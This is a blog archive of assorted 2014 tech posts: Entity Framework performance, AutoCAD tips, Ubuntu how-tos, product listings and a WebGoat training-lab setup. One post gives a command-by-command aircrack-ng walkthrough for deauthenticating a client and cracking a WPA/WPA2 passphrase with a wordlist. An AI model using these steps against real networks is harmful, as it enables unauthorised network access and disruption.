Pages

Senin, 31 Maret 2014

All The Facts To Know About Architecture Project Management Software

By Jeannie Chapman


Many architectural firms are still using generic project management programs to run things. Instead of adapting the firms processes and procedures to the program, it is well worth trying a specific architecture project management software. These type of programs not only help successful manage the work, but provide document management and powerful analysis tools to help run things profitably.

Many firms piece together email, generic pm programs, spreadsheets, documents and a shared drive to manage things. And while this will get you by, you will not be best utilizing resources. Specifically designed architecture project management software blends together all the key components of the these programs into one easy to use interface. Since it is designed with architects in mind, the workflow, terminology and reporting are all tailored to the industry so there is little downtime in switching to the system.

Using specific software means that there is a very quick learning curve. All terminology, reports, templates are specific to the needs of a professional architectural firm. They are designed through close consultation with architects and staff who have real-world experience. This makes things simple, intuitive and much easier to learn. This also means training staff is easier, which means the company will more quickly adopt using the new system.

The core of any PM system is task and resource management. The familiar interface is easy and intuitive, and entering details like tasks, deliverables, resources, dependencies and time frames is quick to input. Once projects begin the software makes it easy to manage and keep track of resources and milestones. There are a variety of ways to illustrate progress, including Gantt charts and calendars of various durations and layouts. Editing and updating is also easy and automatic alerts can be created when tasks come due or resource needs change.

Another important aspect is resource tracking. With all firms emphasizing the maximization of resources and billable hours, it is imperative that the PM have quick access to resource allocation. These tools have many different reports that allow quick analysis of an individuals workload. It is also easy to spot where certain tasks need more attention and shift resources accordingly.

One of the things that makes this software unique for the industry is the document managing abilities. Document workflow lets you track things throughout the life of projects, from initial RFP to proposal to punch list. Instead of emailing documents, the firm can collaborate, and managing changes and versions is integrated into the program. Some feature outside collaboration tools as well so clients can review, change and upload docs.

Project reviews are an important component of the process, both during projects and after completion. Unfortunately these are often done with incomplete information, so not as effective in optimizing the process as they could be. Architecture project management software allows one to truly analyze and dissect a project in a way that allows managers, staff and senior executives to diagnose issues and institute real change.

In todays competitive world, the best concepts and designs do not always lead to a successful architectural firm. Architecture project management software provides PMs with a solid foundation on which they can perform their job. It also takes the full burden off their shoulders and lets each resource be accountable for their own tasks, responsibilities and billability. Check out a demo or a free trial and youll be amazed at the time savings benefits you will receive. You wont regret the switch to the new system and your firm will surely benefit.




About the Author:



Read More..

Minggu, 30 Maret 2014

Guruboards Miniguru Keyboard

Guruboard MiniguruCompanies are always looking for ways to shake up the market they are in and Guruboard is no different with the newest keyboard from the unproved company, conveniently titled the Miniguru, having the potential to do just that.

The basic concept of the Miniguru is simple as it is designed to keep your fingers on the home row. The keyboard tries to do this via special modifier keys that allow you to move through three layers of functions. If you hold down the the modifier button your J, K, L and I keys get turned into your up, down, left and right arrow keys and your Caps Lock button gets turned into your control button.

The keyboard also features a mouse nub which is also designed to keep you keyboard-centric. However, Im pretty sure mouse nubs went out of style back in the 90s so it is a good thing that you can remove it in the highly-custom sales configuration panel. The configuration panel also works in an option to choose from three different switch parts, a plethora of colors and the existence of keycap symbols.

Im not sure how popular this device is going to be. it does look very interesting and the concept behind it is unique. How many people will find a use for this keyboard, or even want it, is still up in the air but Im sure people will want to give it a test run just out of sheer curiosity. Nothing has been heard about a release date, or even if the Miniguru is going to make it out onto the market at all. We can only sit and wait to find out.


Looking for Computer / PC Rental information? Visit the www.rentacomputer.com PC Rental page for your short term business PC needs. Or see this link for a complete line of Personal Computer Rentals.
Read More..

How to Improve Performance of Entity Framework Query

What is an Entity Framework ( EF ) ?
  • Entity Framework is an Object Relational Mapper (ORM)
  • It basically generates business objects and entities according to the database tables
  • Performing basic CRUD (Create, Read, Update, Delete) operations
  • Easily managing "1 to 1", "1 to many", and "many to many" relationships
  • Ability to have Inheritance relationships between entities

Entity Framework Architecture as below :


Entity Framework Architecture

Cold vs. Warm Query Execution

What is a Cold Query Execution ?
  • The very first time any query is made against a given model ,
  • The Entity Framework does a lot of work behind the scenes to load and validate the model
  • We frequently refer to this first query as a "Cold" query

First Query Execution ( Cold query ) Performance is Like below :

First Query Execution ( Cold query )


Second Query Execution (Warm query ) Performance is Like below :

Second Query Execution (Warm query )


How to Improve Performance of First Query Execution ?
  • For that We have to Remove Cost of View Generation

What is View Generation ?
  • In order to understand what view generation is, we must first understand what “Mapping Views” are :

            What are Mapping Views ?

                     # Mapping Views are executable representations of the transformations
                         specified in the  mapping for each entity set and association

            There are 2 types of Mapping Views exist
                               
                1. Query Views
                         - These represent the Transformation necessary to go from the
                            database schema to the  conceptual schema

               2. Update Views
                        - These represent the Transformation necessary to go from the
                           conceptual schema to the database schema
        
  • The process of computing these views based on the specification of the mapping is what we call View Generation
  • View Generation can either take place dynamically when a model is loaded (run timeor at build time (compile time)
  • Default is a Run Time (thats why first query is very slow)
  • When Views are Generated, they are also Validated
  • From a performance standpoint, the Vast Majority of the cost of View Generation is actually the Validation of the Views
  • Which ensures that the connections between the Entities make sense and have the correct Cardinality for all the supported operations

What are the Factors that Affect View Generation Performance ?
  • Model size -  Referring to the number of entities and the amount of associations between these entities
  • Model complexity - Specifically inheritance involving a large number of types
  • Using Independent Associations, instead of Foreign Key Associations (will explain this in a separate blog post)

How to Use Pre-Generated Views to Decrease Model Load Time ?
  • We can use T4 Templates for Create Pre-Generated Views
  • Then View Generation is happened in Compile Time

What is a T4 ?
  • Text Template Transformation Toolkit
  • T4 is a general-purpose Templating Engine you can use to generate C# code, Visual Basic code, XML, HTML, or text of any kind

How to Use T4 For Generate Views ?

Here I am using VS 2010,C# and EF 4.1 with Code First Approach as Technologies

Step 1 : First you need to Download the Templates
              # Right click on your projects Models Folder (where, DbContext derived class exist)
              # Select Add -> New Item Like below
         
New Item


 Step 2 : # In the Add New Item dialog go to “Online Templates”
              # Then Give "EF Views" as Search Condition
              # After that Select "EF CodeFirst View Generation T4 Template for C#" Like below


EF CodeFirst View Generation T4 Template for C#


Step 3 : # In the above Step 2 Change the Name of the file at the bottom to {Context}.Views.tt
             # Where {Context} is the Name of the Class Derived from DbContext you want to
                 create Pre-Generated Views for. 


In my scenario its MusicStoreEntities.Views.tt

Bcos my DbContext derived class in Models Folder as below

using System.Data.Entity;

namespace MvcMusicStore.Models
{
    public class MusicStoreEntities : DbContext
    {
        public DbSet<Album> Albums { getset; }
        public DbSet<Genre> Genres { getset; }
        public DbSet<Artist> Artists { getset; }
        public DbSet<Cart> Carts { getset; }
        public DbSet<Order> Orders { getset; }
        public DbSet<OrderDetail> OrderDetails { getset; }
    }
}

Step 4 : Install Template for First Time


Install Template for First Time

Step 5 : Then Finish the Template Installation by clicking OK Button

OK


What If You have already installed "EF CodeFirst View Generation T4 Template for C#" ?

  • Then You can Bypass Step 2,Step 4 & Step 5s Screens with below one
Bypass Step 2,Step 4 & Step 5s Screens


What is a Final Look of  T4 - Generated Views Inside a Project ?

Final Look of  T4 - Generated Views


Conclusion
  • By Creating Pre-Generated Views You can get More Than 4 ,5 Times Performance Boost for Your First Query Execution
  • This is a Big Difference when Youre considering a Large Domain Models
  • So Try This and Enjoy the Performance Boost

I hope this helps to You.Comments and feedback greatly appreciated.

Happy Coding


Entity Framework Articles

Read More..

Sabtu, 29 Maret 2014

Gelid Solutions Launches Silent Spirit CPU Cooler

Thermal Solutions specialist GELID Solutions launches its first CPU Cooler of its SILENT product line. The Quad heatpipe CPU cooler “Silent Spirit” uses 4 sintered high performance heatpipes for optimum heat transfer from copper core to aluminum fins. The fins are built in a unique architecture to ensure an equal air flow distribution to the heatsink. The “Silent Spirit” cooler will be available in November 2008 and has a MSRP of $35 USD or Euro 23.

This Top-flow cooler “Silent Spirit” follows an open frame structure concept whereby both design and dimensions have been improved to eliminate humming and buzzing noises while maintaining a compact overall size. Precise software calculations were made during the development stage to simulate both airflow and cooling performance in order to create a prototype that would live up to the expectations of a true silent aficionado. In order to cool down the Northbridge heatsink (chipset) and surrounding voltage regulator module close to the CPU, the heatsink has been tilted specially to an angle for this purpose.

Read More..

Jumat, 28 Maret 2014

VideoSecu Computer Monitor TV Wall mount bracket for most 10 to 27 LCD TV and Flat Panel Screen Display VESA100 75 ML40B B05

VideoSecu Computer Monitor TV Wall mount bracket for most 10" to 27" LCD TV and Flat Panel Screen Display VESA100/75 ML40B B05 Review



VideoSecu Computer Monitor TV Wall mount bracket for most 10" to 27" LCD TV and Flat Panel Screen Display VESA100/75 ML40B B05



VideoSecu Computer Monitor TV Wall mount bracket for most 10" to 27" LCD TV and Flat Panel Screen Display VESA100/75 ML40B B05 Feature


  • Fits most 15", 16", 17", 19", 20", 22", 23" and some up to 27" (check VESA and weight )
  • Compatible with VESA 75x75(3"x3") or 100x100(4"x4")
  • Aluminum alloy construction provides loading capacity up to 33 lb
  • 3 pivot points for virtually limitless adjustment and extends to 16"
  • Standard mounting hardware pack included

click here to..check price..


"Buy VideoSecu Computer Monitor TV Wall mount bracket for most 10" to 27" LCD TV and Flat Panel Screen Display VESA100/75 ML40B B05" Overview


This wall mount is designed for LCD Monitor and up to 27" Flat Screen TV. Aluminum alloy construction provides strong support for LCD screens up to 33 lb. The swivel arms fold flat against the wall or extend out up to 16 inch. This two-link arm provides multi-directional adjustment tilts, swivels, swings, and extends. 3 pivot points for virtually limitless adjustment. The black finish elegantly complements offices, conference rooms, merchandising displays, hotel rooms or any room in the home. This mount is VESA 75/100 compliant. Ships pre-assembled for fast and easy installation.You will not be disappointed with VideoSecu Computer Monitor TV Wall mount bracket for most 10" to 27" LCD TV and Flat Panel Screen Display VESA100/75 ML40B B05
You can compare the price of many suppliers here Compare price...


Check Product Rating...


Related Products




Customer Review


Read Customer Reviews








Read More..

Kamis, 27 Maret 2014

NVIDIA GeForce GTX 295 Video Card Pictured

VR-Zon leaked out the first picture of the upcoming NVIDIA GeForce GTX 295 video card this morning. The GeForce GTX 295 is slated to launch at the Consumer Electronics Show (CES) this coming January.

NVIDIA GeForce GTX 295 Video Card

The GeForce GTX 295 is based on the sandwich design again like the 9800GX2 with two 55nm GT200 GPUs. As you can see, there are 2 DVI and 1 Display Port. As for the power connectors, it uses 8+6 pins so that gives you a clue how much power this card needs. The pricing is yet to be disclosed but card makers are speculating that Nvidia will price it competitively against AMD 4870X2 card this time.

Read More..

Rabu, 26 Maret 2014

Desktop Best for Lava Computer OCTOPUS 550 8 Port Serial PCI Card

Good to Lava Computer OCTOPUS-550 8-Port Serial PCI Card using the web

Reviews: Lava Computer OCTOPUS-550 8-Port Serial PCI Card

Lava Computer OCTOPUS-550 8-Port Serial PCI Card

Lava Computer OCTOPUS-550 8-Port Serial PCI Card on the web

Affordable 8 port PCI multi port solution. 8xRS232 PCI Bus ease of install. Shared IRQ. Reliability. MODEL: OCTOPUS-550 VENDOR: LAVA COMPUTER FEATURES: PCI Bus 16550 Eight Port Serial Board The Lava Octopus-550 provides the easiest way to add eight 16550 UART serial ports to a PC system while using only one system IRQ! This eight-port board is one of the most dependable multi-port serial boards around. It is an ideal communications solution in an ISP or remote access system environment. The Octopus-550 is also popular in Point-of-Sale systems where it is a very cost-effective alternative to many other eight-port boards on the market. Adds eight high-speed 16550 UART serial COM ports to any PCI-equipped PC. Serial ports support up to 115.2 kbps throughput rate. All eight ports require only one system IRQ. Automatically selects next available IRQ and COM addresses. Carries the standard pin-out for serial ports. Easy Plug and Play installation Includes octopus cable with eight DB-9 connectors. Includes Lava Com Port Redirect Utility for renaming COM Ports in Windows 95/98/Me. Allows for backward compatibility with software that supports COM 1-4 only. SPECIFICATIONS: -INTERFACE/BUS- 32-bit PCI voltCONNECTORS - (8) 9-pin Serial ports MANUFACTURER WARRANTY: Lifetime Replacement

Read more »
Read More..

Selasa, 25 Maret 2014

Desktop Best for Socket DuraCase Case for Mobile Computer Black

Good to Socket DuraCase Case for Mobile Computer - Black using the web

Reviews: Socket DuraCase Case for Mobile Computer - Black

Socket DuraCase Case for Mobile Computer - Black

Socket DuraCase Case for Mobile Computer - Black on the web

The DuraCase is a hard cover that protects the SoMo 655 from drops and scratches Manufacturer: Socket Mobile, Inc Manufacturer Part Number: HC1715-1416 Manufacturer Website Address: www. socketmobile.com Brand Name: Socket Product Line: DuraCase Product Name: Dura Case Mobile Computer Case Product Type: Case Physical Characteristics: Color: Black Application/Usage: Mobile Computer Compatibility: Socketmobile SoMo 655

Read more »
Read More..

Get Organized With Business Software

By Douglas Rathbone


Running a business of any size has gotten easier with office automation software as it can save time and money. It makes tasks such as accounting, records management, tracking inventory less of a job and more of a process that can be performed by just about anyone that can operate a computer. Those that have used business software will say that they do not know how they did their job without.

One aspect of business is numbers and knowing what is in stock. This is also important for future reference as well when it comes to placing orders or knowing if a special order can be fulfilled. Having inventory figures already in an application saves a lot of time and labor as opposed to doing things the old fashioned way.

Creating bar codes is a feature that no longer has to be outsourced. Whether it is product, employees, or other item that requires tracking, anyone can create a valid number series that can be used for security purposes. Many programs are easy to install and can go live the same day.

Many companies like to keep track of their employees time. This holds especially true when it comes to monitoring time spent at a cubicle or work area. Often it is not possible to see everything that goes on but installing devices that work with computers and other equipment may account for time for on a daily basis.

Being able to account for money that goes in and out is necessary in order to earn a profit. However, some companies would rather hire a bookkeeper or accountant to help keep track of this, office automation software of today has features that are easy to learn. The good thing is that anyone with basic clerical skills can operate this software.

There are also programs that can protect documents and other confidential information. This is helpful in the prevention of fraud and other acts. As reports are easily generated, this can help a business defend themselves should they need to produce documents for legal purposes.

When a business takes the time to find out what areas could use automation, they can choose a program that will fit their needs. Unfortunately, there are programs on the market that are a great price but often they are difficult to operate or they contain more than necessary. While there are some companies that feel they do not need business software, many will say that it has not only helped them save money but also increased productivity and sales.




About the Author:



Read More..

Senin, 24 Maret 2014

AutoCAD 2009 Infocenter Enhancements

Infocenter is not new to AutoCAD, but in the 2009 release it has been improved. I have found Infocenter to be a great tool because I can search for answers in a number of places. The enhancements to it allow the user to expand the search field or to collapse it. This helps to save screen real estate (a big mantra in AutoCAD 2009.) The other biggest improvement is that when searching through the help files, the user can select which documents to look through. This also means that users can search through company documents too. If you have a CAD manual, or even non-AutoCAD documents, they can be searched through in Infocenter. How great is that?

I would like to mention that Infocenter could also be an RSS (Real Simple Syndication) reader. What is an RSS much less an RSS reader? An RSS is simply a way to let others know a website, or blog, or some sort of informational site has been updated. When an RSS feed enabled site has been updated, a note goes out through the RSS feed. Anyone that has subscribed to that feed will be made aware and provided a link. This makes communication very easy. I have an RSS Feed for CAD-a-Blog. If you haven’t signed up for it go ahead. Just click on the RSS Feed button at the top right hand portion of the site. That way when I add something you will know and can get right over here to see it. You don’t have to come here and try and figure out what’s new, if anything. It’s a way of me, helping you, to get the latest info. It is also a courtesy to you to help you maximize your time.

This is also a great tool for CAD Managers to use to help their users. A CAD Manager could set up an RSS feed and have each AutoCAD station set to read it. When an announcement, a new standard, or some bit of information needs to get out to the masses, the manager can update the site and all users will be notified. It could be a great tool.

The newly enhanced Infocenter makes these things much easier to maintain and use.

To add a feed to the Infocenter, or to the Communication Center in AutoCAD 2009, right click the Infocenter icon, click SERACH SETTINGS, and then go to the RSS Feeds button. Click it. A list will be displayed of the current feeds you have set up. To add a feed, click the ADD button at the top. Now, add the feed for CAD-a-Blog: http://feeds.feedburner.com/Cad-a-blog

Happy CADDING!!

Subscribe in a reader



Read More..

Minggu, 23 Maret 2014

Desktop Best for lenovo ThinkCentre Desktop PC Windows 7 Professional

Good to lenovo ThinkCentre Desktop PC Windows 7 Professional using the web

Reviews: lenovo ThinkCentre Desktop PC Windows 7 Professional

lenovo ThinkCentre Desktop PC Windows 7 Professional

lenovo ThinkCentre Desktop PC Windows 7 Professional on the web

1 1.4" 16GB 2 2.90 GHz 3MB 3 Year 4GB 4.60 lb 4004G6U 5 5 GT/s 500GB 64-bit 65 W 7.1" 7.2" 7200 CONFIDENCE COMES WITH THE TOOLS TO DO THE JOB. Productivity depends on reliability and manageability, and both are assured by this entry level business desktop system. Choose your preferred form factor and give your team the power to reach their goals. ThinkCentre M72e 4004G6U Desktop Computer Keyboard Mouse AC/DC Adapter ThinkVantage Product Recovery ThinkVantage Power Manager ThinkVantage Communication Utility Lenovo Message Center Plus Lenovo SimpleTap Adobe Reader Windows Live Essentials Corel Burn. Now Corel DVD MovieFactory ThinkVantage System Update Lenovo Solution Center View Management Utility Norton Internet Security(30 days of virus definitions) Microsoft Office 2010 preloaded; purchase product key to activate Skype Business Black Core i5 DDR3 SDRAM DDR3-1600/PC3-12800 DVD-Writer DVD R/ RW Desktop Computer Dual-core (2 Core) EPEAT Gold Energy Star 5.2 GREENGUARD Genuine Windows 7 Professional Gigabit Ethernet H61 Express HD 2500 Intel Lenovo Lenovo Group Limited M72e Mouse No RoHS Serial ATA/300 Shared ThinkCentre ThinkCentre M72e ThinkCentre M72e 4004G6U Desktop Computer Tiny Yes i5-3470T www. lenovo.com/us/en/

Read more »
Read More..

Sabtu, 22 Maret 2014

AutoCAD 2009 Workarounds to increase Performance

Steve Johnson, writer of BUG WATCH for Cadalyst magazine has a great article this month on how to improve the performance in AutoCAD 2009.

AutoCAD 2009 gave us several new features that often get in the way and Steve talks about handling them in a way you may have already figured out. He also goes into the 2 Service Packs that have been released from Autodesk.

Bug Watch
Read More..

Jumat, 21 Maret 2014

Java Developer Career Success Training

400+ Java & JEE Developer Job Interview Questions and Answers

with lots of diagrams, examples, and code snippets to compliment our books that already have 400+ Java/JEE interview questions and answers and have sold over 30,000 copies world wide. Brush-up prior to your Java job interviews to stand out from your competition. Preparation will breed confidence and success. Be in a position to choose from multiple job offers and negotiate better salaries.













New Web development trend is with angularjs, HTML, CSS, and JavaScript

Client side MVC JavaScript frameworks like angularjs is very popular. Time to learn these client side  web development technologies.

1. Angularjs Questions and answers
2. Angularjs communicating between components
3. HTML and CSS interview questions and answers
4. JavaScript Interview Questions & Answers
5. Coding and debugging with Firebug

For  enhancing existing applications built with JSF and Spring MVC.


Note: Most examples are industrial strength and not just "Hello World", which has its purpose.
Read More..

Kamis, 20 Maret 2014

HOWTO WebGoat 5 4 on Ubuntu Server 12 04 LTS

Step 1 :



Install Ubuntu Server 12.04 LTS as usual. Select OpenSSH server and Tomcat Server at the end of the installer.



Step 2 :



Download the WebGoat 5.4.



wget http://webgoat.googlecode.com/files/WebGoat-5.4.war



Step 3 :



Copy the WebGoat.war to the Tomcat directory.



mv WebGoat-5.4.war WebGoat.war

sudo cp WebGoat.war /var/lib/tomcat6/webapps/




Step 4 :



Edit the tomcat-users.xml for the WebGoat 5.4.



sudo nano /etc/tomcat6/tomcat-users.xml



Insert the following before </tomcat-users> tag :



<role rolename="webgoat_basic"/>

<role rolename="webgoat_admin"/>

<role rolename="webgoat_user"/>

<role rolename="tomcat"/>

<user password="webgoat" roles="webgoat_admin" username="webgoat"/>

<user password="basic" roles="webgoat_user,webgoat_basic" username="basic"/>

<user password="tomcat" roles="tomcat" username="tomcat"/>

<user password="guest" roles="webgoat_user" username="guest"/>




Step 5 :



Restart Tomcat.



sudo /etc/init.d/tomcat6 restart



Step 6 :



Open a browser (e.g. Firefox) and point to the WebGoat (e.g. 192.168.56.102).



http://192.168.56.102:8080/WebGoat/attack



Enter the username and password for both as "guest".



Tutorial



OWASP WebGoat v5.4 Web Hacking Simulation WalkThrough Series



Thats all! See you.



Read More..

Selasa, 18 Maret 2014

TechSmith Releases Camtasia Studio 8




TechSmith has released its latest version of its screen capturing and video editing software Camtasia Studio 8 for Windows. It is available now. You can try it free for 30 days or purchase it for $300 (U.S.D.) Owners of Camtasia Studio 7 can upgrade for $99 (U.S.D.) but this is a limited-time only price. Upgrade now or spend more later.
I use Camtasia Studio to create my AutoCAD Training videos so I can’t wait to start using Camtasia Studio 8. I am literally going to start my next video title this weekend and I will be using Camtasia 8 to do so. I plan on giving a full hands on review in the future.


Here is a short list of the new features in Camtasia Studio 8.
  • Record smoother videos with a higher frame rate (30 fps)
  • Quizzing
  • Screen “Hotspots” where users can click for instant feedback
  • Unlimited Multitrack Editing
  • Major increase to theme library content
  • Content Animation
  • Visual Effects
  • TechSmith Smart Player - allows your content to be viewed “anywhere”

TechSmith rebuilt Camtasia Studio 8 “from the ground up”. They wanted to make video creation more streamlined and easy to do. From what I have seen so far they have. As a CAD Manager that has created How To videos with Camtasia in the past, I really like the idea of the quizzes. This means that I can test how well my users are doing. I can train and test in one easy solution. I know if my videos are effective or not. I can also tell what my users need to work on.

The other feature that I like best is the increase of content in the library. TechSmith has added more music, animations, graphics and callouts that make my videos much more interesting (or at least has the potential to.)

I promise to provide a full hands-on review of Camtasia Studio 8 as I use it more. Download it free for 30 days. Try it out. I like it. You may like it too.


Links:
Camtasia Studio: www.techsmith.com/camtasia
Download Camtasia Studio 8.0: www.techsmith.com/download/camtasia/default.asp
Video Overview of Camtasia Studio 8.0: http://youtu.be/-sJ1M-IKICA
Camtasia Studio 8.0 on YouTube: http://www.youtube.com/ChannelTechSmith
Camtasia Studio on Facebook: http://www.facebook.com/CamtasiaStudio
TechSmith: www.techsmith.com

Read More..

Senin, 17 Maret 2014

HOWTO HSDPA HSPA modem on Ubuntu 9 10

When you are the first time using HSDPA/HSPA modem on Ubuntu 9.10, you will not encounter any problem. However, when you use the modem the second time, it hardly to get the DNS. As a result, you cannot surf the internet.



Therefore, you should write the DNS down when you insert the HSDPA/HSPA modem to the Ubuntu 9.10 the first time. Add the DNS to the Network Manager by editing "IPV4 Setting" - "PPP address only".



The following are some service providers in Hong Kong :



3HK -

Primary DNS 202.45.84.67

Secondary DNS 202.45.84.68



CSL, One2Free, 1010 -

Primary DNS 192.168.63.101

Secondary DNS 192.168.63.102



Smartone Vodefone - unknown to me



Thats all. See you!
Read More..

Minggu, 16 Maret 2014

Freelance CAD Drafting 3D Modeling Renerding GIS Work

CAD-a-Blog is now offering CAD Services. If anyone is in need please contact me at:

bbenton@cad-a-blog.com

Some of the services provided are:
  • Drafting
  • CAD
  • 3D Modeling
  • Renderings
  • Animations
  • Illustrations
  • GIS
  • Surveys
  • Training
  • CAD Standards
  • CAD Templates
  • and much more


Experience:
  • 15 years of hands-on experience in mechanical, structural and civil/Survey design/drafting/modeling.
  • GIS using ESRI, Map Info, and Map3D
  • Knowledge of the latest technology and methods in Computer Assisted Design/Drafting.
  • Alpha & Beta Tester for Autodesk.
  • Writer for AUGI online and print magazines.
  • AUGI online Instructor.
  • Experienced Freelance CAD Services Provider.
  • Proven written and oral communication skills.
  • A passion to learn and to increase his skills.
If you or your company need CAD assistance please contact me. I can provide CAD assistance VIA telecommunication to help you maintain your software or to conduct training one on one or in a group.
Read More..

Sabtu, 15 Maret 2014

HOWTO Microsoft Silverlight on Ubuntu 10 04

Moonlight is a clone of Microsoft Silverlight for Linux. Ubuntu 10.04 LTS is already have it in the repository.



sudo apt-get update

sudo apt-get upgrade

sudo apt-get install libmoon moonlight-plugin-mozilla moonlight-plugin-core




Happy Mid-Autumn Festival!



Thats all! See you.
Read More..

Jumat, 14 Maret 2014

Google Dart New Programming language to replace JavaScript


Google Dart: Structured Web Programming language

Google has launched its much awaited mysterious DART web programming language. Ahh another programming language…, why does google launched a new language Google DART? What I read from web is that google is trying to replace JavaScript as main web scripting language. Over the years from Netscape Era JavaScript has evolved, formed a large based of Developers and has existing codes, framework and utilities, so I am not sure how far Google DART can go but this is a serious attempt to replace JavaScript much in the line of Chrome which was launched to replace Internet Explorer and What we see now is they are living happily with there own market share though Chrome is growing and snatching market share form other browsers.

Now let’s get back to Google Dart, according to leaked Memo, Google perceives that Security Problems of JavaScript cannot be solved by modifying or evolving language and it has tried to solve that on Google Dart: A structured web programming language on its own way.


Example of Google Dart Code
Lets see an example Hello World program in Google Dart, I bet you will see and understand it in one second if you written code in Java or C#.


  main(){
  print("Hello World from Google Dart");
  print("My Name is Google Dart and I am going to replace JavaScript");
  }


Nothing fancy simple and familiar syntax and thats what Google reiterate as one of design goal.
You can execute Dart Code in two ways either in native Dart Virtual Machine; Google is planning Dart support in Chrome and push other vendors to do the same.


Salient feature of Google Dart

Familiar Syntax: if you look Google Dart code you will easily able to understand whats going on because its syntax is quite similar to Java,Which is undoubted world famous programming language.Its is also similar to C# on same line.

High Performance: Dart is promising high performance from web browser to hand held devices to Server Side Execution.

Runs in Virtual Machine: Similar to Java Google Dart also run on Virtual Machine.
Google Dart is semi typed language where you can switch from typed to untype based on your need.

Open Source: Google Dart is open source project and it comes with set of tools for compiling and executing Dart Code. You can check dartlang.org for further details.
 

How Google Dart will get Popular

Google is doing its hard work to get Dart accepted by web developers and community and arranging support, tools and execution environment for Google Dart.

1. Google will provide support of Dart in Google Chrome by integrating native virtual Machine and it will encourage to Microsoft and Mozilla to do the same.

2. Google will provide a Cross Compiler which will convert Dart to ECMAScript 3 , so that it can run on Non Dart Browser. This will be the major step as getting Dart Virtual Machine integrated on all popular brower might take some time.
 
 
What is positive for Google Dart

Though Google Dart is a new programming language and anything new takes it time to get adopted and supported by community and thats the most difficult phase for language. Google Dart is not an exception but there are some positive facts which suggest that it can go a long way:

Technologically advanced: Dart is technological advanced than JavaScript and since it aims to fix security and other problems of JavaScript it will definitely have an appeal.

Google: Since language is developed and launched by Google, expect future support, marketing and strong backup from Google.

Familiar Syntax: Google Dart doesnt reinvent the wheel at least on language syntax its quite familiar to Java and C# which gives it easy access of large community of Java and C# web developer.

Google Dart Cross Compiler: Cross compiler will make Dart running on browsers which doesnt have native Google Dart Virtual Machine, if google gets it right this would be the biggest point and can provide language an initial thrust.

High Performance: Google Dart Promises high performance from web browser, web Server to hand held devices
  
  
If you want to know more about Google Dart I suggest reading References

Read More..

HOWTO Crack WPA WPA2 PSK with dictionary

At the moment, we need to use dictionaries to brute force the WPA/WPA-PSK. To crack WPA/WPA2-PSK requires the to be cracked key is in your dictionaries.



The following tutorial is based on Back|Track 4.



Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4.



Step 1 :

apt-get install wpa-wordlist



Step 2 :

airmon-ng start wlan0



Step 3 :

airodump-ng mon0



Step 4 :

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0



Step 5:

aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0



To get the handshake when done and then go to next step. If not, do it again until you get the handshake.



Step 6 :

aircrack-ng output-01.cap -w /pentest/password/wordlist/wpa.txt



Good luck!



WARNING : Do NOT crack any wifi router without authorization or you may be put into jail.



Thats all. See you!
Read More..

Kamis, 13 Maret 2014

Spyware Removal Support


Read More..

Rabu, 12 Maret 2014

HOWTO VPN PPTP on BackTrack 5 R2

Step 1 :



apt-get update

apt-get dist-upgrade




apt-get install network-manager-gnome network-manager-pptp



Step 2 :



cp /etc/network/interfaces /etc/network/interfaces.bak



nano /etc/network/interfaces



Delete all entries but left the first two lines behind.



auto lo

iface lo inet loopback




Step 3 :



service network-manager start



Step 4 :



System >> Startup Applications >> Network Manager



Append "&" on the end of the Command. It will be looked like this :



nm-applet --sm-disable &



Make sure Start dhclient is enabled in the menu of Startup Applications.



Reboot the system and then configure your VPN (PPTP) as usual.



Make sure Advanced >> Use Point-to-Point encryption (MPPE) is enabled in the Configuration of PPTP.



Thats all! See you.

Read More..

Selasa, 11 Maret 2014

ADDA Education Conference coming to St Louis

Visit ADDA in St. Louis
April 14-18, 2008
49th Annual Educational Technical Conference

ADDA is the Gateway to Continuing Education and
Professional Development for the Graphics Industry

click here

ADDA St. Louis Educational Conference
since 1948 ADDA has been here for you as a Professional
Designer - Drafter - Graphic Artist - Technical Illustrator
Architectural & Engineering Technician - Digital Designer

ADDA Offers you the entire Professional Package
Professional Membership - Councils - Chapters
Training - Classroom Curriculum - Education
Professional Certification - Support - Networking

Wonder Why you are passed over for Promotions?
Salary Increase? or missed that New Job?

PROFESSIONALS supporting PROFESSIONALS
You will become like those to whom you Associate !

Celebrating 60 years
ADDA is the Answer !
Dont Hesitate to set yourself APART !



ADDA International
105 East Main Street
Newbern
Tennessee 38059
United States
Read More..

Senin, 10 Maret 2014

CAD Wars

Ok, Im having a Geek moment here, but what do you expect from me? I am what I am. Here is a video that was created entirely in Autodesk Inventor 2009!



According to responses the creator left on the You Tube site, this is how long it took him to make this video:

40-50 hours
25 hours of rendering
2 gig bitmap data :)
resolution: 720 x 486

i did it in Inventor because i am trainer/supporter/evangelist for an Autodesk reseller who mainly sells... guess what?
Inventor :)

the explosion shows what i was able to do in that short of time i had... 1 week for modeling and animations, 2 days for rendering, 1 evening for editing and sounds&arrangement.. :))

I think this is wicked cool because Industrial Light and Magic, George Lucas special effects company, work with Autodesk products like Maya and Studio max 3D. They also use their own software called Sabre. This isnt to far off from how Hollywood does things.

Great work. Can any of you make a video like this? Make one, or two, post it to You Tube and let me know. Id be happy to link to it here.
Read More..

Minggu, 09 Maret 2014

Difference between Truncate and Delete command in SQL Interview Questions with Example

Delete and truncate command in SQL
Truncate and delete in SQL
are two commands which is used to remove or delete data from table. Though quite basic in nature both sql commands can create lot of trouble until you are familiar with details before using it. Difference between Truncate and delete are not just important to understand perspective but also a very popular SQL interview topic which in my opinion a definite worthy topic. What makes them tricky is amount of data. Since most of Electronic trading system stores large amount of transactional data and some even maintain historical data, good understanding of delete and truncate command is required to effectively work on those environment.I have still seen people firing delete command just to empty a table with millions of records which eventually lock the whole table for doing anything and take ages to complete or Simply blew log segment or hang the machine.

Read more »
Read More..

Autodesk SketchBook Mobile for Android 0 10

The Android Market is celebrating the downloading of Ten Billion apps with their 10 Days of Offers - Top Premium Apps for $0.10 per day sale!!  Yes its a mouthful.  The bottom line is that today Android users can get Autodesks SketchBook Mobile for $0.10!!!  It is normally priced at $1.00 I believe.  At that price it wont break the bank but at one tenth the normal cost you may want to try it out if you havent already.

Right now the other nine apps for ten cents are:
Check them out.  I also use Paper Camera and SwiftKey in case you were wondering.
Read More..

Sabtu, 08 Maret 2014

Show the Speaker Volume Icon on Windows XP

